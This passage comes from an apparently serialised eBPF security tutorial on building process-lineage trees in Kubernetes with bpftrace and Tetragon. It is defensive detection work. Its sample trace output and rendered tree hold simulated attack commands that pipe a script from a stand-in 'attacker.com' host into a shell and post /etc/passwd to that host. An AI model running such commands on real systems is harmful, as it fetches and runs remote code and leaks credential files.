bpftrace -e '
tracepoint:syscalls:sys_exit_clone {
    if (args->ret > 0) {
        // args->ret is the child PID (from the parent's perspective)
        printf("FORK parent=%-6d child=%-6d parent_comm=%-20s\n",
               pid, args->ret, comm);
    }
}'

# Every exec — capture what binary replaced the process image
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
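    printf("EXEC pid=%-6d ppid=%-6d binary=%-40s args=",
           pid,
           curtask->real_parent->tgid,
           str(args->filename));
    // join() prints the whole argv array followed by a newline;
    // str(*args->argv) would print only argv[0]
    join(args->argv);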
}'

Combined output (30 seconds, simplified):

FORK parent=18201 child=18293  parent_comm=my-app
EXEC pid=18293 ppid=18201 binary=/bin/sh              args=sh -c curl http://...
FORK parent=18293 child=18294  parent_comm=sh
EXEC pid=18294 ppid=18293 binary=/bin/sh              args=sh payload.sh
FORK parent=18294 child=18295  parent_comm=sh
EXEC pid=18295 ppid=18294 binary=/bin/cat             args=cat /etc/passwd
FORK parent=18294 child=18296  parent_comm=sh
EXEC pid=18296 ppid=18294 binary=/usr/bin/curl        args=curl http://attacker.com/exfil -d @/etc/passwd

Each line is a kernel event. The parent/child PID chain is the tree. Rendered:

my-app (18201)
  └── sh (18293) — "sh -c curl http://attacker.com/payload.sh | sh"
        └── sh (18294) — "sh payload.sh"
              ├── cat (18295) — "/etc/passwd"
              └── curl (18296) — "http://attacker.com/exfil -d @/etc/passwd"

This tree is constructed entirely from kernel events. No application logging. No container stdout. No agent inside the container.
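Turning the event stream into the rendered tree is a small parsing job. The sketch below assumes the exact FORK/EXEC line layout shown in the combined output above; the function names and the "(exec not observed)" placeholder are illustrative choices, not part of bpftrace.

```python
import re
from collections import defaultdict

FORK_RE = re.compile(r"^FORK parent=(\d+)\s+child=(\d+)")
EXEC_RE = re.compile(r"^EXEC pid=(\d+)\s+ppid=(\d+)\s+binary=(\S+)\s+args=(.*)$")


def build_tree(lines):
    """Collect parent -> children links and the last command exec'd per PID."""
    children = defaultdict(list)  # parent pid -> child pids, in arrival order
    commands = {}                 # pid -> command line from its latest exec
    for line in lines:
        if m := FORK_RE.match(line):
            parent, child = int(m[1]), int(m[2])
            if child not in children[parent]:
                children[parent].append(child)
        elif m := EXEC_RE.match(line):
            pid, ppid = int(m[1]), int(m[2])
            commands[pid] = m[4].strip()
            # An exec can be seen without its fork (trace started late).
            if pid not in children[ppid]:
                children[ppid].append(pid)
    return children, commands


def render(pid, children, commands, depth=0):
    """Return the subtree rooted at pid as indented text lines."""
    label = commands.get(pid, "(exec not observed)")
    out = [f"{'  ' * depth}{pid} {label}"]
    for child in children.get(pid, []):
        out.extend(render(child, children, commands, depth + 1))
    return out
```

Calling render(18201, *build_tree(lines)) on the eight sample lines yields one indented line per process. This version keys on PID alone, which is enough for a short capture window; longer recordings need the PID-reuse handling covered in the gotchas.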

How Tetragon Stores the Process Tree in BPF Maps

bpftrace’s approach above produces an event stream — a log you reconstruct manually. Tetragon takes a different approach: it maintains a live process tree in BPF maps, updated on every fork and exec event, persistently queryable.

Kernel events (kprobe on clone, execve, exit)
      ↓
Tetragon eBPF programs
      ↓
Write to BPF_MAP_TYPE_HASH: process_cache
      key: PID
      value: {binary, args, start_time, parent_pid, pod_name, namespace, uid, gid, caps}
      ↓
Tetragon userspace agent
      reads process_cache on events
      enriches with Kubernetes pod metadata (from informer cache)
      exports to gRPC stream → observability backend

task_struct in BPF maps — Tetragon doesn’t store the raw task_struct pointer in its maps (pointers are not stable across process lifetime). Instead, it stores a snapshot of the relevant fields (PID, binary path, arguments, capabilities, cgroup path, start time) at the moment of the exec event, keyed by PID. When the process exits, the entry is kept in the cache for a configurable window to allow late-arriving events (like file closes or connection terminations) to be correlated back to the originating process.

To inspect Tetragon’s process cache directly:

# Find the Tetragon process cache map
bpftool map list | grep process_cache

# 112: hash  name process_cache  flags 0x0
#      key 4B  value 256B  max_entries 65536  memlock 16777216B

# Dump a few entries
bpftool map dump id 112 | head -60

# [{
#     "key": 18293,                           # ← PID
#     "value": {
#         "binary": "/bin/sh",
#         "args": "sh -c curl http://...",
#         "pid": 18293,
#         "ppid": 18201,
#         "uid": 1000,
#         "start_time": 1745296443,
#         "cgroup": "kubepods/burstable/pod3f8a21bc/.../payments"
#     }
# }]

The cgroup field maps directly to the pod — same path as /proc/<pid>/cgroup but captured at exec time and stored in kernel space.
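Extracting the pod UID from a cgroup path can be sketched in a few lines of Python. This assumes the two common kubelet layouts: the cgroupfs driver, where the UID keeps its dashes, and the systemd driver, where dashes become underscores. The function names and the UIDs in the usage note are made up for illustration; check the layout on your own nodes before relying on the pattern.

```python
import re

# "pod" followed by a UUID whose separators are "-" (cgroupfs) or "_" (systemd).
_POD_UID = re.compile(
    r"pod([0-9a-f]{8}[-_][0-9a-f]{4}[-_][0-9a-f]{4}[-_][0-9a-f]{4}[-_][0-9a-f]{12})"
)


def pod_uid_from_cgroup(path):
    """Return the pod UID embedded in a cgroup path, or None if there is none."""
    match = _POD_UID.search(path)
    if match is None:
        return None
    return match.group(1).replace("_", "-")  # normalise to the API-server form


def pod_uid_for_pid(pid):
    """Look up a live process's pod UID via /proc/<pid>/cgroup."""
    with open(f"/proc/{pid}/cgroup") as handle:
        for line in handle:
            # Each line is "hierarchy-id:controllers:path".
            parts = line.rstrip("\n").split(":", 2)
            if len(parts) == 3:
                uid = pod_uid_from_cgroup(parts[2])
                if uid is not None:
                    return uid
    return None
```

For example, pod_uid_from_cgroup("/kubepods/burstable/pod0a1b2c3d-1111-2222-3333-444455556666/abc") returns the dashed UID, which can then be matched against metadata.uid from the Kubernetes API. A path outside kubepods returns None.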

Correlating Files and Connections to the Process Tree

Process lineage is most useful when combined with the file access and network connection events from the same process. Tetragon’s TracingPolicy supports this multi-event correlation natively:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: observe-process-lineage
spec:
  kprobes:
    - call: "security_inode_permission"
      syscall: false
      args:
        - index: 0
          type: "inode"
      selectors:
        - matchNamespaces:
            - namespace: Net
              operator: "NotIn"
              values: ["host_ns"]    # exclude the host network namespace
          matchActions:
            - action: Post   # audit: log but don't block
    - call: "tcp_connect"
      syscall: false
      args:
        - index: 0
          type: "sock"
      selectors:
        - matchActions:
            - action: Post

With this policy active, Tetragon emits events for both file access and TCP connections, each carrying the full process context (PID, binary, pod, parent). Correlated by PID and timestamp:

tetra getevents | jq 'select(.process_kprobe.function_name == "tcp_connect") |
  {pid: .process_kprobe.process.pid,
   binary: .process_kprobe.process.binary,
   pod: .process_kprobe.process.pod.name,
   dst: .process_kprobe.args[0].sock_arg.daddr}'

Sample output:

{"pid": 18296, "binary": "/usr/bin/curl", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}
{"pid": 18297, "binary": "/usr/bin/wget", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}

PIDs 18296 and 18297 both connected to the same IP. Cross-reference with the process tree: those are the curl and wget spawned by the attacker’s payload script, so the destination IP is the attacker’s infrastructure. The timeline is precise to well under a millisecond because each event is timestamped by the kernel at the hook point, not when userspace later processes it.
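The same cross-reference can be done offline on exported events. The sketch below assumes one JSON event per line and uses only the fields that appear in the sample output and jq filter above (process_exec.process, process_kprobe.function_name, args[0].sock_arg.daddr). The function name is hypothetical. It joins on PID alone for brevity, so pair the PID with the process start time in real data.

```python
import json


def correlate_connections(json_lines):
    """Attach the launching command line to every tcp_connect event."""
    launched = {}   # pid -> process record from its process_exec event
    findings = []
    for raw in json_lines:
        event = json.loads(raw)
        if "process_exec" in event:
            proc = event["process_exec"]["process"]
            launched[proc["pid"]] = proc
            continue
        kprobe = event.get("process_kprobe", {})
        if kprobe.get("function_name") != "tcp_connect":
            continue  # file-access and other kprobe events are ignored here
        pid = kprobe["process"]["pid"]
        findings.append({
            "pid": pid,
            "binary": kprobe["process"].get("binary"),
            # None when the exec happened before the capture window began.
            "arguments": launched.get(pid, {}).get("arguments"),
            "dst": kprobe["args"][0]["sock_arg"]["daddr"],
        })
    return findings
```

Each finding answers two of the three incident questions at once: which command ran, and where it connected.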

Building Process Lineage Without Tetragon

If you’re not running Tetragon, you can build a basic process lineage recorder with bpftrace that writes to a file:

# Record all exec events to a file — run in the background on the node
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("%llu EXEC pid=%-6d ppid=%-6d binary=%s\n",
           nsecs, pid, curtask->real_parent->tgid, str(args->filename));
}
tracepoint:sched:sched_process_exit {
    printf("%llu EXIT pid=%-6d comm=%s\n", nsecs, pid, comm);
}
' > /var/log/process-lineage.log &

# Tail the log for real-time observation
tail -f /var/log/process-lineage.log

Sample output:

734912123456789 EXEC pid=18293 ppid=18201 binary=/bin/sh
734912234567890 EXEC pid=18294 ppid=18293 binary=/bin/sh
734912345678901 EXEC pid=18295 ppid=18294 binary=/bin/cat
734912456789012 EXIT pid=18295 comm=cat
734912567890123 EXEC pid=18296 ppid=18294 binary=/usr/bin/curl
734912678901234 EXIT pid=18293 comm=sh

This file survives pod restarts because it’s on the node, not in the container. After the pod is restarted, the process lineage record is still on disk. You reconstruct the tree by grouping by ppid and ordering by timestamp. The timestamps come from bpftrace’s nsecs built-in, which counts nanoseconds since boot rather than since the Unix epoch, so add the node’s boot time if you need wall-clock values.
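Grouping by ppid and ordering by timestamp can be sketched as follows. The parser assumes the exact "<timestamp> EXEC|EXIT key=value ..." layout produced by the recorder above. The function name and the returned structures are illustrative choices.

```python
from collections import defaultdict


def parse_lineage_log(lines):
    """Return (children, lifetimes) from '<nsecs> EXEC|EXIT key=value ...' lines."""
    events = []
    for line in lines:
        fields = line.split()
        if len(fields) < 3 or fields[1] not in ("EXEC", "EXIT"):
            continue  # skip blank lines and bpftrace's "Attaching ..." banner
        attrs = dict(f.split("=", 1) for f in fields[2:] if "=" in f)
        events.append((int(fields[0]), fields[1], attrs))
    events.sort(key=lambda event: event[0])  # order by kernel timestamp

    children = defaultdict(list)  # ppid -> [(pid, binary), ...] in time order
    started = {}                  # pid -> timestamp of its most recent exec
    lifetimes = {}                # pid -> nanoseconds between exec and exit
    for timestamp, kind, attrs in events:
        pid = int(attrs["pid"])
        if kind == "EXEC":
            children[int(attrs["ppid"])].append((pid, attrs["binary"]))
            started[pid] = timestamp
        elif pid in started:
            # Popping the start entry keeps a later reuse of this PID separate.
            lifetimes[pid] = timestamp - started.pop(pid)
    return children, lifetimes
```

With the file from the recorder, `parse_lineage_log(open("/var/log/process-lineage.log"))` gives the children of each parent in execution order, plus how long each exited process ran. Processes still running when the log ends have no lifetime entry.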

⚠ Production Gotchas

Ringbuf saturation on high-process-churn nodes. Nodes running serverless workloads or short-lived batch jobs may spawn thousands of processes per minute. Hooking exec on every process at that rate generates a high ringbuf write volume. Filter at the eBPF level by cgroup (namespace) rather than in userspace — sending events to userspace only to discard them wastes ringbuf space and CPU. Tetragon’s namespace selector does this filtering in the eBPF program before the write.

The 15-character comm truncation. The comm field in task_struct is limited to 15 characters (plus null terminator). Process names longer than 15 characters are truncated. bpftrace’s comm built-in has the same limit. For the full binary path, read from execve’s filename argument at the tracepoint, not from comm.

PID reuse. Linux PIDs are reused after a process exits. In a high-churn environment, a PID you recorded as an attacker process may be reassigned to a legitimate process seconds later. Always pair PIDs with start time and cgroup path when correlating across events. Tetragon handles this in its exported events by giving each process an exec_id derived from the PID and start time.
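A reuse-safe key is cheap to build from /proc. The sketch below assumes a Linux host and reads field 22 (starttime, in clock ticks since boot) from /proc/<pid>/stat. The function name is made up for this example.

```python
import os


def process_key(pid):
    """Return (pid, starttime_ticks), which stays unique across PID reuse."""
    with open(f"/proc/{pid}/stat") as handle:
        stat = handle.read()
    # Field 2 (comm) is wrapped in parentheses and may itself contain spaces
    # or ")", so split on the LAST ")" before tokenising the other fields.
    after_comm = stat[stat.rindex(")") + 2:].split()
    # after_comm[0] is field 3 (state), so field 22 (starttime) is index 19.
    return pid, int(after_comm[19])


if __name__ == "__main__":
    print(process_key(os.getpid()))
```

Two processes that reuse the same PID get different start times, so the tuple never collides the way a bare PID can. The same idea applies to recorded events: key on PID plus the timestamp of the exec that started the process.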

Exec chains lose argument history. When execve replaces the process image, task_struct->comm changes but the PID does not. If the attacker’s shell runs exec bash to replace itself with a less suspicious binary name, the exec event records the new binary under the same PID and the parent link is unchanged, so the lineage stays intact. What disappears is the earlier name and arguments, unless you kept the previous exec event for that PID. Don’t rely on comm alone for process identity; always track the binary path from each exec event.

Process events don’t capture file content. You see that /bin/cat /etc/passwd ran. You don’t see what was in /etc/passwd at that moment unless you also capture file open/read events. Tetragon’s security_inode_permission hook tells you which files were accessed; capturing their content requires additional hooks on vfs_read with buffer capture, which is significantly higher overhead and requires careful data handling for sensitive files.

Quick Reference

What you want	Command
Live exec trace (bpftrace)	`bpftrace -e 'tracepoint:syscalls:sys_enter_execve { printf(...) }'`
Fork + exec tree	Combine `sys_exit_clone` + `sys_enter_execve` traces, correlate by pid/ppid
Tetragon process events	`tetra getevents --event-types PROCESS_EXEC`
Tetragon file + network	`tetra getevents --event-types PROCESS_KPROBE`
Process cache map	`bpftool map list | grep process_cache` → `bpftool map dump id N`
Map PID to pod	`cat /proc/<pid>/cgroup` → extract pod UID
Process exit events	`tracepoint:sched:sched_process_exit`

Process event	Kernel hook
New process spawned	`tracepoint:syscalls:sys_exit_clone` (args->ret > 0 = child PID)
Binary executed	`tracepoint:syscalls:sys_enter_execve`
Process exited	`tracepoint:sched:sched_process_exit`
File opened	`tracepoint:syscalls:sys_enter_openat`
Network connect	`kprobe:tcp_connect`
DNS query	`tracepoint:syscalls:sys_enter_sendto` (port 53)

Key Takeaways

Process lineage with eBPF hooks fork and exec at the kernel level — every process spawned on a node is recorded with its parent PID, binary path, arguments, and container context, regardless of what the container does to suppress application logs
The kernel’s task_struct is the authoritative source of process identity; eBPF programs read it at hook time and snapshot the relevant fields into BPF maps before the process can exit or be killed
Tetragon maintains a live process tree in BPF maps, correlates it with Kubernetes metadata, and makes it queryable by pod/namespace — the record persists after the pod is restarted
Incident reconstruction requires joining process lineage with file access and network connection events by PID and timestamp; eBPF provides all three event streams from the same kernel attachment mechanism
PID reuse is a real concern in high-churn environments; always pair PIDs with start time and cgroup path when correlating across events
Kernel-level process events cannot be suppressed from inside an unprivileged container: an attacker with root inside the container, but without host access or the privileges to tamper with BPF programs, cannot prevent bpftrace or Tetragon running on the host from recording their syscalls

What’s Next

EP14 is the payoff episode for the entire series arc so far. You’ve seen programs load (EP04), maps hold state (EP05), CO-RE keep programs portable (EP06), XDP and TC enforce at the network layer (EP07, EP08), bpftrace ask one-off questions (EP09), and the observability stack collect flow, DNS, and process data continuously (EP10, EP11, EP12, EP13).

EP14 synthesises all of it into four commands that tell you everything about any cluster you’ve never seen before — any eBPF-based tool, any vendor, any configuration. The audit playbook is what you run in the first 10 minutes when you inherit a cluster and need to understand what’s enforcing policy at the kernel level before you can trust anything it tells you.

Next: the audit playbook — four commands to see any cluster
